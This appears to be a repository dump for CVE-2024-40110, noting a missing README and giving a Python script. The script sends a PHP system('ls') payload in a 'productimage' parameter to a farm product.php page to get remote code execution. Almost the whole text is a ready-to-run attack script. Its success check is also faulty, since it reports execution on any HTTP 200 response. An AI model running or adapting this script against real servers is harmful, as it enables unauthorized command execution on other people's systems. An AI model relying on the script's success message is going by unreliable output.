README.md
README.md not found for CVE-2024-40110. The file may not exist in the repository.
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)